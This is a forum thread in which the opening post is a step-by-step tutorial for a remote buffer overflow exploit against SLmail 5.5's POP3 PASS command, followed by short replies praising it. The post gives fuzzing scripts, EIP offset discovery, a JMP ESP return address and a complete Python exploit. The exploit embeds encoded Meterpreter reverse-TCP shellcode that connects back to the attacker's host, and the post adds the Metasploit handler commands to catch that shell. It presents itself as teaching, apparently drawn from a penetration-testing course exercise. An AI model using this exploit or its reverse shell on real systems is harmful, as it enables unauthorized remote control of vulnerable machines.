Author Topic: Introduction to remote exploitation (with an actual example)  (Read 3815 times)

0 Members and 1 Guest are viewing this topic.

Offline b0whunter

  • Serf
  • *
  • Posts: 41
  • Cookies: 11
  • The finest sword plunged into salt water will rust
    • View Profile
    • My journal
Introduction to remote exploitation (with an actual example)
« on: January 03, 2014, 12:35:46 am »

Lets say we have a target (ourselves) and ran nmap (a portscanner) on it and discovered open port. The service running on it is SLmail v 5.5. (which is available here: http://download.cnet.com/SLmail/3000-18506_4-10002446.html


How do we look for a vulnerability? Since its a binary thus the source isnt available, all we can do is download a trial version, reverse engineer it or fuzz test the software. Let's try fuzzing, i.e. sending expected, or random data to the inputs of a computer program.


Here, im running linux on my attacking machine and downloaded and installed a free trial version of SLmail on a windows XP xp2 and I want to test the POP service on port 110. Since I do not know the account credentials, the only commands I can fuzz on that service are USER and PASS. On the windows machine, install and start SLMail. Then attach ollydbg to it. (just start ollydbg and click file, select "attach" and select SLmail)


There are several fuzzers available, spike being popular, but to keep it simple I'll write a very basic fuzzer in python to illustrate the concept:


Code: [Select]

#!/usr/bin/python
import socket
command="PASS"
buffer=["A"]
counter=20
while len(buffer) <=60:
    buffer.append("A"*counter)
    counter=counter+100
for string in buffer:
        print "Fuzzing " + command + " with lenght:" +str(len(string))
        s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        connect=s.connect(('192.168.2.40',110))
        s.recv(1024)
        s.send('USER Jay\r\n')
        s.send(command + ' ' + string + '\r\n')
        s.recv(1024)
        s.send('QUIT\r\n')
        s.close()



In the above code, I skipped the USER command fuzzing since it didnt crash. To fuzz PASS, you need to first input a "USER username" command first. Now we're ready to fuzz PASS. The program will connect to port 110, supply a user name and then send a bunch of A's, if it doesnt crash the program, it will send more A's, on so on (until I send about 5000 A's in this scenario).


We check Ollydbg and oops we do get a memory access violation!






As you can see, we have overwritten the EIP with A's (represented by 41)
Since the EIP register controls the execution flow of the program, that means we can now control the application and redirect it to do whatever we want. A shell would be nice!


Now we must find the exact 4 bytes in our buffer to overwrite it. Here's a way to narrow it down:


Code: [Select]

import socket
buffer = '\x41' * 1000 + '\x42' * 1000 + '\x43' * 1000 + '\x44' * 1000 + '\x45' * 1000
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sending evil buffer..."
connect=s.connect(('192.168.2.40',110))
s.recv(1024)
s.send('USER Jay\r\n')
s.recv(1024)
s.send('PASS ' +buffer+ '\r\n')
s.close()



If we overwrite the EIP with A's in this new code, that means the 4 bytes overwriting the EIP are located in the first 1000 byte range, if B's, in-between 1000 and 2000, and so on.


Lets see what happens in ollydbg:







Looking at the EIP register, we can see that we have overwritten in with E's (\x45), thus the 4 bytes we're looking after are in-between 4000-5000 in our buffer. We could do this for a while until we get them but I'll let you on a a neat tool by metasploit. pattern_create.rb, it creates a specific pattern and will provide us with the exact location. So we need a length of 5000 so we issue the following command:


Code: [Select]
./pattern_create.rb 5000


we copy the output and paste it in our buffer:


Code: [Select]

import socket
buffer = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac​6Ac7Ac"
"8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4A​f5Af6Af7Af8Af9Ag"
"0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6A​i7Ai8Ai9Aj0Aj1Aj"
"2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8A​l9Am0Am1Am2Am3Am"
"4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0A​p1Ap2Ap3Ap4Ap5Ap"
"6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2A​s3As4As5As6As7As"
"8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4A​v5Av6Av7Av8Av9Aw"
"0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6A​y7Ay8Ay9Az0Az1Az"
"2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8B​b9Bc0Bc1Bc2Bc3Bc"
"4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0B​f1Bf2Bf3Bf4Bf5Bf"
"6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2B​i3Bi4Bi5Bi6Bi7Bi"
"8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4B​l5Bl6Bl7Bl8Bl9Bm"
"0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6B​o7Bo8Bo9Bp0Bp1Bp"
"2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8B​r9Bs0Bs1Bs2Bs3Bs"
"4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0B​v1Bv2Bv3Bv4Bv5Bv"
"6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2B​y3By4By5By6By7By"
"8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4C​b5Cb6Cb7Cb8Cb9Cc"
"0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6C​e7Ce8Ce9Cf0Cf1Cf"
"2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8C​h9Ci0Ci1Ci2Ci3Ci"
"4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0C​l1Cl2Cl3Cl4Cl5Cl"
"6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2C​o3Co4Co5Co6Co7Co"
"8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4C​r5Cr6Cr7Cr8Cr9Cs"
"0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6C​u7Cu8Cu9Cv0Cv1Cv"
"2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8C​x9Cy0Cy1Cy2Cy3Cy"
"4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0D​b1Db2Db3Db4Db5Db"
"6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2D​e3De4De5De6De7De"
"8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4D​h5Dh6Dh7Dh8Dh9Di"
"0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6D​k7Dk8Dk9Dl0Dl1Dl"
"2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8D​n9Do0Do1Do2Do3Do"
"4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0D​r1Dr2Dr3Dr4Dr5Dr"
"6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2D​u3Du4Du5Du6Du7Du"
"8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4D​x5Dx6Dx7Dx8Dx9Dy"
"0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6E​a7Ea8Ea9Eb0Eb1Eb"
"2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8E​d9Ee0Ee1Ee2Ee3Ee"
"4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0E​h1Eh2Eh3Eh4Eh5Eh"
"6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2E​k3Ek4Ek5Ek6Ek7Ek"
"8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4E​n5En6En7En8En9Eo"
"0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6E​q7Eq8Eq9Er0Er1Er"
"2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8E​t9Eu0Eu1Eu2Eu3Eu"
"4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0E​x1Ex2Ex3Ex4Ex5Ex"
"6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2F​a3Fa4Fa5Fa6Fa7Fa"
"8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4F​d5Fd6Fd7Fd8Fd9Fe"
"0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6F​g7Fg8Fg9Fh0Fh1Fh"
"2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8F​j9Fk0Fk1Fk2Fk3Fk"
"4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0F​n1Fn2Fn3Fn4Fn5Fn"
"6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2F​q3Fq4Fq5Fq6Fq7Fq"
"8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4F​t5Ft6Ft7Ft8Ft9Fu"
"0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6F​w7Fw8Fw9Fx0Fx1Fx"
"2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8F​z9Ga0Ga1Ga2Ga3Ga"
"4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0G​d1Gd2Gd3Gd4Gd5Gd"
"6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2G​g3Gg4Gg5Gg6Gg7Gg"
"8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4G​j5Gj6Gj7Gj8Gj9Gk"
"0Gk1Gk2Gk3Gk4Gk5Gk"
#buffer = '\x41' * 1000 + '\x42' * 1000 + '\x43' * 1000 + '\x44' * 1000 + '\x45' * 1000
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sending evil buffer..."
connect=s.connect(('192.168.2.40',110))
s.recv(1024)
s.send('USER Jay\r\n')
s.recv(1024)
s.send('PASS ' +buffer+ '\r\n')
s.close()



We send it and check the result in ollydbg.
We take the bytes that overwrote the EIP and we need to convert them since they're in hex and reverse them because of the order they go in the EIP. To save you the trouble, i wrote a little script that will sort this out for you:


Code: [Select]

#!/usr/bin/python
import binascii, sys
def hex2ascii(string):
   s=binascii.unhexlify(string)
   print s[::-1]
   exit(0)
def main():
   if len(sys.argv) <2:
      print "[-]Usage:%s <string>"% sys.argv[0] + "\r"
      sys.exit(0)
   string = sys.argv[1]
   hex2ascii(string)
if __name__ == '__main__':
   main()


The output was z1Fz. So now we use the other tool provided by metasploit to know the exact location of the EIP.


Code: [Select]
./pattern_offset.rb z1Fz


We now have the location of the EIP, at 4654. lets test it with our script:


Code: [Select]
#!/usr/bin/python
import socket
buffer = '\x41' * 4654 + '\x42' * 4 + '\x43' * 1000
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sending evil buffer..."
connect=s.connect(('192.168.2.40',110))
s.recv(1024)
s.send('USER Jay\r\n')
s.recv(1024)
s.send('PASS ' +buffer+ '\r\n')
s.close()


Here we send 4654 A's, then 4B's and then C's. So we shoud overwrite the EIP with B's(\x42), lets check ollydbg:








Bingo, we overwrote exacty with 4 B's the EIP. We are in full control of th EIP. Whats left to do is to find a convenient location for our shellcode. To do that we need to examine the CPU registers right after the crash. click on the ESP register (stack pointer) and select follow in dump. Nice, i have a 1000s C's at that location, more than enough room for my shellcode.


To find a way to ensure we get to the ESP, we need a way to get to the ESP address. For that let's click the 'E' button (Executable Modules button) to look at the DLL's. USER32.DLL is convenient since it's in the core DLL system and its address is static accross service packs. From there we need to find a 'JMP ESP' instruction. So just click on USER32.DLL and click 'search for' and type in 'JMP ESP'. Here;s its at 77D718FC. So in our script, we will now send 4654 A's, then overwrite the EIP with that address so that it will use the JMP ESP instruction to send us to our shellcode. But for testing, we'll send C's after:


Code: [Select]
#!/usr/bin/python
import socket
ret = "\xfc\x18\xd7\x77"
buffer = '\x41' * 4654 + ret + '\x90' * 16+ '\xCC' * 1014
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sending evil buffer..."
connect=s.connect(('192.168.2.40',110))
s.recv(1024)
s.send('USER Jay\r\n')
s.recv(1024)
s.send('PASS ' +buffer+ '\r\n')
s.close()



You probably noticed the \x90 in my code, its a NOP instruction, which is no instruction. This is just in case I do not land precisely at the address of my shellcode, it will slide the NOPs to it.


Lets's check ollydbg:








Bingo, look in the bottom right corner, we landed right in my NOPs followed by Cs! All we have to do is replace the C's by the shellcode!


You can find shellcodes on the net, although it can be risky, alternatively you can write your own or use a metasploit to provide you one. You can use a shellcode that will bind a shell on a port on the target machine, but if he's behind a router, that’s not very effective, so I'll show you how to use a metasploit tool to write a shellcode that will make the target machine connect to us instead:


Code: [Select]
msfpayload windows/meterpreter/reverse_tcp LHOST="192.168.2.37" LPORT="4444"|msfencode -e x86/alpha_mixed -b '\x00\xff' -t c


So the target machine will connect to me, in that case 192.168.2.37 because we are on the same subnet, but that works over the internet as well. so we add our shellcode to the script:


Code: [Select]
#!/usr/bin/python
import socket
sc=("\xb8\xf0\x48\xbe\x6a\xdb\xda\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x49\x31\x43\x14\x83\xeb\xfc\x03\x43\x10\x12\xbd\x42"
"\x82\x5b\x3e\xbb\x53\x3b\xb6\x5e\x62\x69\xac\x2b\xd7\xbd"
"\xa6\x7e\xd4\x36\xea\x6a\x6f\x3a\x23\x9c\xd8\xf0\x15\x93"
"\xd9\x35\x9a\x7f\x19\x54\x66\x82\x4e\xb6\x57\x4d\x83\xb7"
"\x90\xb0\x6c\xe5\x49\xbe\xdf\x19\xfd\x82\xe3\x18\xd1\x88"
"\x5c\x62\x54\x4e\x28\xd8\x57\x9f\x81\x57\x1f\x07\xa9\x3f"
"\x80\x36\x7e\x5c\xfc\x71\x0b\x96\x76\x80\xdd\xe7\x77\xb2"
"\x21\xab\x49\x7a\xac\xb2\x8e\xbd\x4f\xc1\xe4\xbd\xf2\xd1"
"\x3e\xbf\x28\x54\xa3\x67\xba\xce\x07\x99\x6f\x88\xcc\x95"
"\xc4\xdf\x8b\xb9\xdb\x0c\xa0\xc6\x50\xb3\x67\x4f\x22\x97"
"\xa3\x0b\xf0\xb6\xf2\xf1\x57\xc7\xe5\x5e\x07\x6d\x6d\x4c"
"\x5c\x17\x2c\x19\x91\x25\xcf\xd9\xbd\x3e\xbc\xeb\x62\x94"
"\x2a\x40\xea\x32\xac\xa7\xc1\x82\x22\x56\xea\xf2\x6b\x9d"
"\xbe\xa2\x03\x34\xbf\x29\xd4\xb9\x6a\xfd\x84\x15\xc5\xbd"
"\x74\xd6\xb5\x55\x9f\xd9\xea\x45\xa0\x33\x83\xef\x5a\xd4"
"\x6c\x47\x66\x01\x05\x95\x67\x58\x89\x10\x81\x30\x21\x74"
"\x19\xad\xd8\xdd\xd1\x4c\x24\xc8\x9f\x4f\xae\xfe\x60\x01"
"\x47\x8b\x72\xf6\xa7\xc6\x29\x51\xb7\xfd\x44\x5e\x2d\xf9"
"\xce\x09\xd9\x03\x36\x7d\x46\xfc\x1d\xf5\x4f\x68\xde\x62"
"\xb0\x7c\xde\x72\xe6\x16\xde\x1a\x5e\x42\x8d\x3f\xa1\x5f"
"\xa1\x93\x34\x5f\x90\x40\x9e\x37\x1e\xbe\xe8\x98\xe1\x95"
"\xe8\xe5\x37\xd0\x6e\x1f\x32\x30\xb3")
ret = "\xfc\x18\xd7\x77"
buffer = '\x41' * 4654 + ret + '\x90' * 16 + sc
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "Sending evil buffer..."
connect=s.connect(('192.168.2.40',110))
s.recv(1024)
s.send('USER Jay\r\n')
s.recv(1024)
s.send('PASS ' +buffer+ '\r\n')
s.close()



ow we need to have a listener on port 4444 to receive our shell from our victim. Metasploit provides a nice handler for that.
Start metasploit then:


Code: [Select]
>use exploit/multi/handler
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST 192.168.2.37
>set LPORT 4444
>exploit



Now that we are listening on port 4444, we launch our exploit!


bingo we get a connection!
From there we can set up a keylogger, etc, but anyway, to get a shell, just use the following command:


Code: [Select]
execute -i -f cmd.exe


ongratulations, you have a shell!:


“Engage people with what they expect; it is what they are able to discern and confirms their projections. It settles them into predictable patterns of response, occupying their minds while you wait for the extraordinary moment — that which they cannot anticipate.”
― Sun Tzu, The Art of War

Offline d4rkcat

  • Knight
  • **
  • Posts: 287
  • Cookies: 115
  • He who controls the past controls the future. He who controls the present controls the past.
    • View Profile
    • Scripts
Re: Introduction to remote exploitation (with an actual example)
« Reply #1 on: January 03, 2014, 01:23:11 am »
Great tutorial thanks very much for breaking it down.
I'm sure this will be very helpful and we will see more RCE PoC's  ;D
+1
Jabber (OTR required): thed4rkcat@einfachjabber.de    Email (PGP required): thed4rkcat@yandex.com    PGP Key: here and here     Blog

<sofldan> not asking for anyone to hold my hand uber space shuttle door gunner guy.


Offline detective6

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 13
  • Step back. Evaluate. Recognize.
    • View Profile
Re: Introduction to remote exploitation (with an actual example)
« Reply #2 on: January 03, 2014, 01:27:53 am »
I'm pretty sure this is taken directly from Offensive Security's PWB course. I remember going through this exact exercise.


I know this looks like science fiction; it's not.

Offline b0whunter

  • Serf
  • *
  • Posts: 41
  • Cookies: 11
  • The finest sword plunged into salt water will rust
    • View Profile
    • My journal
Re: Introduction to remote exploitation (with an actual example)
« Reply #3 on: January 03, 2014, 02:30:02 am »
Not the same program, but same approach. Its actually the assignment lol
“Engage people with what they expect; it is what they are able to discern and confirms their projections. It settles them into predictable patterns of response, occupying their minds while you wait for the extraordinary moment — that which they cannot anticipate.”
― Sun Tzu, The Art of War

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
    • View Profile
Re: Introduction to remote exploitation (with an actual example)
« Reply #4 on: January 03, 2014, 06:50:07 am »
Nice write-up.
This is some great content that is very much appreciated.
Keep it up.
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage

Offline d4rkcat

  • Knight
  • **
  • Posts: 287
  • Cookies: 115
  • He who controls the past controls the future. He who controls the present controls the past.
    • View Profile
    • Scripts
Re: Introduction to remote exploitation (with an actual example)
« Reply #5 on: January 03, 2014, 08:22:06 pm »
Who cares if it's from a course?
Not all of us have the time/money to do a course.
Now i don't have to do the course and I will still have the same skills!

So Thank you very much b0whunter, Much appreciated and any more you got would love to see more.

Cheers
Jabber (OTR required): thed4rkcat@einfachjabber.de    Email (PGP required): thed4rkcat@yandex.com    PGP Key: here and here     Blog

<sofldan> not asking for anyone to hold my hand uber space shuttle door gunner guy.


Offline detective6

  • /dev/null
  • *
  • Posts: 8
  • Cookies: 13
  • Step back. Evaluate. Recognize.
    • View Profile
Re: Introduction to remote exploitation (with an actual example)
« Reply #6 on: January 04, 2014, 01:20:26 am »
Relax man, I wasn't trying to be accusatory.
I simply thought that it looked familiar and wanted to let everyone know what it was from, in case they wanted to purchase the course or something. Take a chill pill.
I know this looks like science fiction; it's not.

Offline b0whunter

  • Serf
  • *
  • Posts: 41
  • Cookies: 11
  • The finest sword plunged into salt water will rust
    • View Profile
    • My journal
Re: Introduction to remote exploitation (with an actual example)
« Reply #7 on: January 04, 2014, 05:39:20 am »
Thanks d4rkcat, I believe in sharing information and if it helps one person learn something, I'll keep at it.


Detective6, the second course looks even better! I still have lots to digest, assimilate and learn before and computer stuff is a hobby of mine, so theres no rush, but man I just can't stop learning about it!
“Engage people with what they expect; it is what they are able to discern and confirms their projections. It settles them into predictable patterns of response, occupying their minds while you wait for the extraordinary moment — that which they cannot anticipate.”
― Sun Tzu, The Art of War

Offline Traitor4000

  • Knight
  • **
  • Posts: 191
  • Cookies: 8
    • View Profile
Re: Introduction to remote exploitation (with an actual example)
« Reply #8 on: January 06, 2014, 02:20:30 am »
ew windows ew, just joking nice tutorial. It will help me who is stuck on windows because something is wrong with my computer that prevents me from installing operating systems. I was using linux then i uninstalled it to upgrade and now unfortunately im stuck. So yay windows!  :P
The most vulnerable part of an impenetrable system is those who believe it to be so.